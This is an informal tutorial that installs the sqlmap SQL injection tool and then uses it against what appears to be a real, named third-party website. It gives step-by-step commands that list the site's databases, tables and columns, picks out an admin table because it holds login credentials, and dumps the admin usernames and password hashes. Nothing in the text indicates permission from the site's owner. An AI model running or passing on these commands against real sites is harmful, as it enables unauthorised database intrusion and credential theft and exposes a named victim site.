penetration testing based linux os like backtrack backbox blackbunut, sqlmap comes already installed .
but you can use sqlmap on other system easily :)
how ??? ok follow these steps , its really not a big deal ;)
SQLmap official website , from where you can download sqlmap source code
http://sqlmap.org/
download link :-
https://github.com/sqlmapproject/sqlmap/zipball/master
sqlmap source code has been saved with name master
its zip file, to extract its content run command unzip master.
you will get a directory having name sqlmap project something like that, enter into that directory and list files
yesssss :) . here is our sqlmap source code .
sqlmap is coded in python and sqlmap.py is the main file which is used for performing SQL injection.
so lets start >:D<
you can run sqlmap.py in 2 ways, either using python or using ./ ;)
python sqlmap.py option
./sqlmap.py option
if sqlmap.py file has execute permission, you can run sqlmap using ./
for listing available options for sqlmap usage , supply -h option
like this
./sqlmap.py -h
he is the link where you can get options
https://github.com/sqlmapproject/sqlmap/wiki/Usage
for example i want to extract database of a sql injection vulnerable website using sqlmap
website link is http://www.iapex.com.pk/messages.php?id=4
command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 --dbs
here -u stands for sql injection vulnerable url
--dbs stands for databases \ ^_^ /
as you will run this command , sqlmap will start injecting thi url and will extract databases name
after completion of process , you will get results like this
like, now you want to get list of tables in database, you will need to specify database name
./sqlmap.py -u webite.com/vulnerable.php?id=4 -D database_name --tables
in my case i am going for database having name iapexcom_new
so command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new --tables
here -D stands for , database that has to be enumerate
we have 2 databases , we can enumerate tables from these database .
in above command we are enumerating table list of database iapexcom_new
after completion of process , sqlmap will show list of tables under database
and so on :)
as we know
database has tables and every table has columns .
columns contains information/data
so performing sql injection using sqlmap,first we extract database name ,then tables list from that database
after extracting tables name , we select a table and extract list of columns in that table
and then we can get information stored in columns
lets extract columns from table of database ;)
i am going for table es_admin because this table contains columns which has username and password of website admin stored in it :P
./sqlmap.py -u website.com/vulnerable.php?id=4 -D idatabase_name -T table_name --columns
ok
query will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new -T es_admin --columns
meaning of this command is
inject a website url (-u) http://www.iapex.com.pk/messages.php?id=4 whose database name is iapexcom_new (-D) and table name is (-T) es_admin and extract names of columns from table
wait for few minutes untill sqlmap extract columns name from table es_admin
it will show result like this
ok now we have columns name too, lets go and extract data stored in these columns :P
command will be
./sqlmap.py -u website.com/vulnerable..php?id=4 -D database_name -T table_name -C column_name --dump
command in my case
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new -T es_admin -C username,password --dump
after process completion you will get result like this
you have done >:D<, and you can see username and password hash which are stored in table 'es_admin' in columns having name username and password
this is how you can use sqlmap on linux os where it is not installed already :)
enjoy
Thank you :)